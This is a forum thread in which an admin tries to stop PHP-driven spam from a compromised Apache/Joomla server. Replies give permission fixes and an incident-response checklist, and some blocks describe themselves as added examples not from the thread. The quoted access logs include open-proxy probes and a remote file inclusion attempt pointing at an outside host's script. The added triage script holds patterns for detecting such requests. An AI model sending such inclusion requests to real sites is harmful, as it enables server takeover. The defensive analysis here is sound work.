LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 07-22-2009, 07:06 PM   #1
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

apache being used for spamming


First of all I have to explain that this is not my server. I'm just trying to fix a setup I didn't install or configure; I just have access to it via ssh, so my info is perhaps incomplete or inaccurate.
The problem is that this particular server is being used for sending spam using apache scripts. The MTA is qmail and seems to be properly configured to forbid open relay. The distro used is Fedora 6, and it seems to be mostly a web server; it hosts several sites (with apache 2.2.3) built with Joomla 1.0.15.
Here is the mail from technical support explaining the problem:

Quote:
Hello,

We could see spamming from your server. That's why the mail queue became this huge. This is the content of the spam from your server:

*********************
--------------
MESSAGE NUMBER 10503249
--------------
Received: (qmail 9567 invoked by uid 48); 20 Jul 2009 10:16:06 -0500
Date: 20 Jul 2009 10:16:06 -0500
Message-ID: <20090720151606.9564.qmail@PanamB.ds>
To: dan1988@yandex.ru, dan1988dan@yandex.ru, dan1989@yandex.ru,
dan1990@yandex.ru, dan1991@yandex.ru, dan19921992@yandex.ru,
dan1993@yandex.ru, dan1994@yandex.ru
Subject: ���������c3kc!!
From: chasm4@gmail.com
To: dan1988@yandex.ru, dan1988dan@yandex.ru, dan1989@yandex.ru,
dan1990@yandex.ru, dan1991@yandex.ru, dan19921992@yandex.ru,
dan1993@yandex.ru, dan1994@yandex.ru
Subject: ���������c3kc!!
Reply-To: chasm4@gmail.com
Mime-Version: 1.0
Content-type: text/html; charset=windows-1251


�� ������� . ���� �� ����� ������� �oTuKu ,
�� ������� http://drjiwa.com/includes/jndex.html ��� �� �. ���� ����� ... ������������
************************

The spam mails are sent from apache using scripts. I have disabled some of the scripts. Please check the UID of the user who is sending the mail. This clearly indicates that the spam mails are being sent out of the server via the apache service.

**************
Received: (qmail 9049 invoked by uid 48); 20 Jul 2009 05:54:59 -0500
[root@PanamB ~]# grep 48 /etc/passwd
apache:x:48:48:Apache:/var/www:/sbin/nologin
[root@PanamB ~]# grep 48 /etc/passwd
apache:x:48:48:Apache:/var/www:/sbin/nologin
antadbiz:x:10005:48::/var/www/vhosts/antad.biz:/bin/false
**************


As the number of messages in the queue was too large, the email service on the server was down. Qmail was not able to process the queue, so I have cleared the qmail queue to get the mail service working.

Now the mails are going out of the server. Currently there is no spamming on the server.

****************
[root@PanamB ~]# ./qmHandle -s
Messages in local queue: 0
Messages in remote queue: 0
[root@PanamB ~]#
***************

Please do verify from your part.

In case you have any further queries or troubles, please do let us know with sufficient LOGIN DETAILS (with password, ports, etc. for checking) and the EXACT steps/URLs to recreate the scenario at our end. Also include any needed ERROR details.


We have checked your query in detail. We could see that some of the domains (canalpaisano.com, eduardoestrella.net, fernandoelizondo.org, iq-zone.com, partidopatriota.com, partidopatriota.net, patriajoven.com) have some suspicious files hosted inside them. We had to disable some of those scripts. Upon further analysis we could see that many files and directories were given 777 permissions, which is really dangerous. This will help any hacker to exploit the server and send out spam. We suggest you go through the files and modify the permissions.

>>>>What should we do to avoid this problem forever?

In order to resolve this problem you need to conduct a detailed security audit on the server to check for vulnerabilities. You may have to apply patches and other security fixes if necessary.
To prevent further spam I modified the sendmail_path in php.ini, so PHP can't send any more mails. But I'm aware that this is not the optimal solution. Can somebody suggest the correct way to deal with this problem? Also, how can I search for all the files with permissions set to 777 in order to correct them?
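A less drastic alternative to disabling sendmail_path outright, added here as an example that is not from the thread: point php.ini's sendmail_path at a small wrapper that logs who called sendmail and what the message headers were, then hands the message on to the real binary. PHP changes into the calling script's directory before running sendmail, so the logged cwd points at the vhost directory the mail came from. The paths /usr/sbin/sendmail and /var/log/phpmail.log and the install name sendmail-wrap are assumptions.

```shell
#!/bin/sh
# Logging sendmail wrapper; in php.ini:  sendmail_path = /usr/local/bin/sendmail-wrap -t -i
# Added example, not from the thread. REAL_SENDMAIL, LOGFILE and the
# install name sendmail-wrap are assumptions.
REAL_SENDMAIL=${REAL_SENDMAIL:-/usr/sbin/sendmail}
LOGFILE=${PHPMAIL_LOG:-/var/log/phpmail.log}

# Build one log line from the saved message ($1) and the sendmail arguments:
# timestamp, uid, calling directory (PHP chdirs to the script's directory
# before spawning sendmail), the arguments, and the To:/Subject: headers.
format_entry() {
    msg=$1; shift
    # stop at the first blank line so body text is never mistaken for a header
    hdrs=$(sed -n '/^$/q; /^[Tt][Oo]:/p; /^[Ss][Uu][Bb][Jj][Ee][Cc][Tt]:/p' "$msg" | tr '\n' ' ')
    printf '%s uid=%s cwd=%s args="%s" %s\n' \
        "$(date '+%Y-%m-%d %H:%M:%S')" "$(id -u)" "$PWD" "$*" "$hdrs"
}

# Read the message from stdin, log it, then feed it to the real sendmail.
wrapper_main() {
    tmp=$(mktemp) || exit 75            # EX_TEMPFAIL: PHP's mail() sees a failure
    cat > "$tmp"
    format_entry "$tmp" "$@" >> "$LOGFILE"
    "$REAL_SENDMAIL" "$@" < "$tmp"
    rc=$?
    rm -f "$tmp"
    exit "$rc"
}

# Only act as the wrapper when installed under that name; loading the file
# under another name just defines the functions.
if [ "${0##*/}" = "sendmail-wrap" ]; then
    wrapper_main "$@"
fi
```

During the next burst, counting the cwd= values in the log shows which directory the mail is coming from, which is the question rogerdv could not answer from the apache logs alone.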
 
Old 07-22-2009, 07:37 PM   #2
GaijinPunch
Member
 
Registered: Aug 2003
Location: Tokyo, Japan
Distribution: Gentoo
Posts: 130

To find files w/ 777 permissions:

Code:
find / -perm 777 -print
As for the PHP sending mails... it could be any number of scripts doing the mailing. If they are well made scripts (which they very likely aren't) they use some central type of class to do the mailing (I use phpmailer). If you find this class, it makes searching the php scripts easier. You could also modify it to take some type of validation parameter, and have any legit mailing routine pass that parameter, and in effect nullify any spam script. They still might eat up CPU though.

On the flip side, each script could also do all the "mailing" itself, which could make the hunt a lot nastier.

Last edited by GaijinPunch; 07-22-2009 at 07:38 PM.
 
Old 07-22-2009, 08:07 PM   #3
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Original Poster
Still hunting the conflictive scripts. But there are thousands of 777 files and directories. Is there any way to recursively run chmod to fix the files and directories at the same time without messing up the x permission for directories?
 
Old 07-22-2009, 11:24 PM   #4
win32sux
Guru
 
Registered: Jul 2003
Location: Los Angeles
Distribution: Ubuntu
Posts: 9,870

Quote:
Originally Posted by rogerdv
Still hunting the conflictive scripts. But there are thousands of 777 files and directories. Is there any way to recursively run chmod to fix the files and directories at the same time without messing up the x permission for directories?
You could do a:
Code:
find / -type f -perm 777 -exec chmod XXX {} \;
Replace XXX with the perms you want to assign, and remove "-type f" if you don't only want to chmod files.

Make sure you BACKUP everything before doing anything.

Last edited by win32sux; 07-22-2009 at 11:25 PM.
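Taking win32sux's find/-exec approach one step further to answer the question about directories, as an added example that is not from the thread: handle directories and regular files in separate passes so directories keep their execute (traversal) bit. It also generalises from exactly 777 to anything world-writable (mode bit 0002), and offers a conservative variant that only drops the write bits. The document root path is a placeholder; back up first, as win32sux says.

```shell
#!/bin/sh
# Added example, not from the thread: reset world-writable entries under a
# web document root. Directories get 755 (traversal bit kept), regular
# files 644. Usage: sh fixperms.sh /var/www/vhosts   (path is a placeholder)

# Two passes, so directories never end up 644 and files never get 755.
# -perm -0002 means "others may write", which also catches 666 files,
# not only 777. -type d/-type f also skip symlinks, whose own mode is
# usually 777 and whose chmod would hit the link target instead.
fix_perms() {
    find "$1" -type d -perm -0002 -exec chmod 755 {} +
    find "$1" -type f -perm -0002 -exec chmod 644 {} +
}

# Conservative alternative: only drop the group/other write bits and leave
# everything else, including x on any CGI script, exactly as it was.
strip_write_bits() {
    find "$1" ! -type l -perm -0002 -exec chmod go-w {} +
}

# Number of world-writable entries (excluding symlinks) left under a tree;
# 0 after either fix.
count_world_writable() {
    find "$1" ! -type l -perm -0002 | wc -l | tr -d ' '
}

if [ $# -eq 1 ] && [ -d "$1" ]; then
    echo "world-writable before: $(count_world_writable "$1")"
    fix_perms "$1"
    echo "world-writable after:  $(count_world_writable "$1")"
fi
```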
 
Old 07-23-2009, 07:06 AM   #5
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,703
Blog Entries: 54

...in addition to what's been said already, and before you go off hunting for file permissions it would be good to create an overview of things to do.


Quote:
Originally Posted by rogerdv
First of all i have to explain that this is not my server. Im just trying to fix a setup I didnt installed of configured,
It is good that you are taking responsibility for correcting mistakes. This not being your server doesn't require any apologies; in fact it can be an advantage because you can look at things more objectively. You should choose to make an effort in being as complete as possible, because more than chmodding is needed, and you should perform tasks in as short a timeframe as possible. In preparation make sure you
- have the right tools at your disposal and
- keep a clear eye on the goals.
You should choose to
- keep a checklist and log of tasks you perform,
- locate and make backups whenever necessary and
- have an overview of things to mitigate and problems to correct and a plan to work with.
Also please list what tasks you have performed already when you reply. This enables us to help you better.
* Since this is a commercial hosting platform you have to make clear to yourself that while you perform those tasks you can not serve two masters because as long as the current situation is allowed to exist the machine remains susceptible to abuse.

* Use 'screen' to enable yourself to run multiple tasks in different virtual terminal windows (and do enable logging with CTRL-A, H).
The first things to do would be to make sure the foundation you work on is trustworthy and mitigate:
0. verify the system state ('rpm -Vva 2>&1| tee /root/rpmva.log') and review the log,
1. do not log in as root but have a suitable unprivileged account to SSH into and use public key authentication,
2. make sure you can use sudo to perform the necessary system maintenance, then
3. (enumerate and) ensure that only authorized users have access to the system itself (passwd, group, shadow, last, lastb, lastlog, w, who or run GNU Tiger or Lsat),
4. mitigate the situation by disallowing any clients to access the host as unauthorized or unauthorized user (vipw),
5. mitigate the situation by denying access to publicly accessible services (/etc/hosts.{allow,deny}, firewall),
6. check the last two tasks actually result in denied access (ps, lsof, iptables, netstat, last, lastb, lastlog, w, who).

Proceed by taking stock of the situation and investigating:
- review the /etc/syslog.conf for logging options, then review syslog and any daemon-specific logs (visual inspection, logwatch, mailbox),
- enumerate (publicly accessible) services and who has access to those,
- review any user homes contents,
- from running 'rpm -Vva',
- install and run GNU Tiger, chkrootkit and rootkit hunter and review the logs (general system health, not rootkits),
- unpack the textfile from the joomla-file-diagnostics_1.0.15.zip and use those hashes to verify files,
- review the 8 hosts your technical support marked as having suspicious files.

When this is complete you should restore default system file permissions using 'rpm --set-perms' and chmod back any Docroot or UserDir dirs and files.

Please be as complete and verbose in your answers as possible and if anything is unclear please ask before acting.
And please do check back often so this situation doesn't drag on for days.

* Anyone please correct me if I forgot to address anything in this assessment phase.

Last edited by unSpawn; 07-23-2009 at 04:43 PM. Reason: //Typo
 
Old 07-23-2009, 04:19 PM   #6
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Original Poster
Ok, the attack seems to have stopped, or at least the last spam I see in the qmail queue is from Jul 22 around 13-14 hours. I have checked the apache logs carefully looking for suspicious activity during that time and it seems that right at that time apache didn't serve any files. Any idea about what other log file could help?
 
Old 07-23-2009, 07:53 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,703
Blog Entries: 54

Quote:
Originally Posted by rogerdv
Ok, the attack seems to have stopped, or at least the last spam I see in the qmail queue is from Jul 22 around 13-14 hours.
That is nice but what does it really mean in terms of "plugging the hole"?


Quote:
Originally Posted by rogerdv
I have checked the apache logs carefully looking for suspicious activity during that time and it seems that right at that time apache didn't serve any files.
Maybe looking through logrotated or archived logs may reveal more.


Quote:
Originally Posted by rogerdv
Any idea about what other log file could help?
Depending on what's running, when and how logs get rotated and where your applications write to, how about the result of 'lsof -P -w -n +D/var | awk '/[0-9].*w / {print $NF}'|sort -u'?

BTW you haven't addressed anything in the last two replies. Is there anything you didn't get? Do you think it's overkill? Do you have reading problems? ;-p

Last edited by unSpawn; 07-23-2009 at 07:55 PM. Reason: //Typo
 
Old 07-23-2009, 08:28 PM   #8
rogerdv
Member
 
Registered: Jul 2005
Location: Cuba
Distribution: redhat
Posts: 52

Original Poster
I followed some of your advice, some of it was not needed (tech support installed and executed rootkit detection tools) and some was already implemented. So, your reply was useful and the only persisting problem is that we can't find what files were used to send the mails (and so, probably I won't get paid for 2 days of looking at log files and going home at 9 PM when the rest of the city is enjoying the carnivals). The tech support refers to some "disabled scripts", but they don't specify, so I don't know what they mean by disable.
By the way, there are some weird lines in the apache logs; can somebody explain to me why they refer to external URLs?

Code:
91.212.127.100 - - [22/Jul/2009:20:45:11 -0500] "GET http://ant.dsabuse.com/abc.php?auth=45V456b09m&strPassword=P%5BSHUR_FDG%5CWB&nLoginId=43 HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"

210.72.4.129 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.yahoo.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
210.72.4.129 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.yahoo.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
210.72.4.129 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.yahoo.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0 (compatible; MSIE 5.01; Win2000)"
92.240.68.152 - - [23/Jul/2009:04:42:53 -0500] "GET http://www.threeimaginarygirls.com/files/primus_0.jpg HTTP/1.1" 404 308 "http://random.yahoo.com/fast/ryl" "webcollage/1.135a"
This is another couple of lines that annoy me:
Code:
65.50.119.235 - - [22/Jul/2009:04:52:22 -0500] "GET /appserv/main.php?appserv_root=http://190.161.40.22/appserv/t.txt? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
65.50.119.235 - - [22/Jul/2009:04:52:22 -0500] "GET /appserv/main.php?appserv_root=http://190.161.40.22/appserv/t.txt? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
 
Old 07-23-2009, 09:08 PM   #9
unSpawn
Moderator
 
Registered: May 2001
Posts: 27,703
Blog Entries: 54

Quote:
Originally Posted by rogerdv
and the only persisting problem is that we cant find what files were used
Ah, I see. Well good luck with that then.


Quote:
Originally Posted by rogerdv
Code:
"GET /appserv/main.php?appserv_root=http://190.161.40.22/appserv/t.txt?
Looks like (a failed attempt at) remote file inclusion to me.

Last edited by unSpawn; 07-23-2009 at 09:12 PM. Reason: //Ameliorate
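A quick way to triage the two request patterns rogerdv posted (absolute-URL requests, which are probes for an open proxy, and a query parameter whose value is itself a URL, the remote file inclusion attempt unSpawn identifies), written as an added example that is not from the thread. It reads Apache combined-format lines; the sample log is constructed with RFC 5737 documentation addresses, not copied from the server.

```shell
#!/bin/sh
# Added example, not from the thread: tag suspicious request lines in an
# Apache combined-format access log.
#   PROXY-PROBE : request-URI is an absolute URL (someone testing for an open proxy)
#   RFI-ATTEMPT : a query parameter whose value is itself a URL
# Usage: sh triage.sh /var/log/httpd/access_log   (path is a placeholder)

flag_requests() {
    awk '
        { split($0, q, "\""); req = q[2] }       # request line sits between the first pair of quotes
        req ~ /^[A-Z]+ https?:\/\// { print "PROXY-PROBE " $1 " " req; next }
        req ~ /[?&][^ ]*=(https?|ftp):\/\// { print "RFI-ATTEMPT " $1 " " req; next }
    ' "$1"
}

# Count lines carrying a given tag, e.g. count_tag access_log RFI-ATTEMPT
count_tag() {
    flag_requests "$1" | grep -c "^$2 " || true
}

# Constructed sample log (RFC 5737 addresses) written to the file named in $1
write_sample_log() {
    cat > "$1" <<'EOF'
192.0.2.10 - - [22/Jul/2009:20:45:11 -0500] "GET http://probe.example/abc.php?auth=1 HTTP/1.1" 404 285 "-" "Mozilla/5.0"
192.0.2.11 - - [23/Jul/2009:02:00:58 -0500] "GET http://www.example.com/ HTTP/1.1" 200 3523 "-" "Mozilla/5.0"
192.0.2.12 - - [22/Jul/2009:04:52:22 -0500] "GET /appserv/main.php?appserv_root=http://192.0.2.99/t.txt? HTTP/1.1" 404 292 "-" "Mozilla/4.0"
192.0.2.13 - - [22/Jul/2009:04:53:00 -0500] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
EOF
}

if [ $# -eq 1 ]; then
    flag_requests "$1"
fi
```

Both patterns returned 404 in rogerdv's log, so they are noise rather than the spam source, but a 200 on an RFI-style request would be the line worth following up.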
 
  

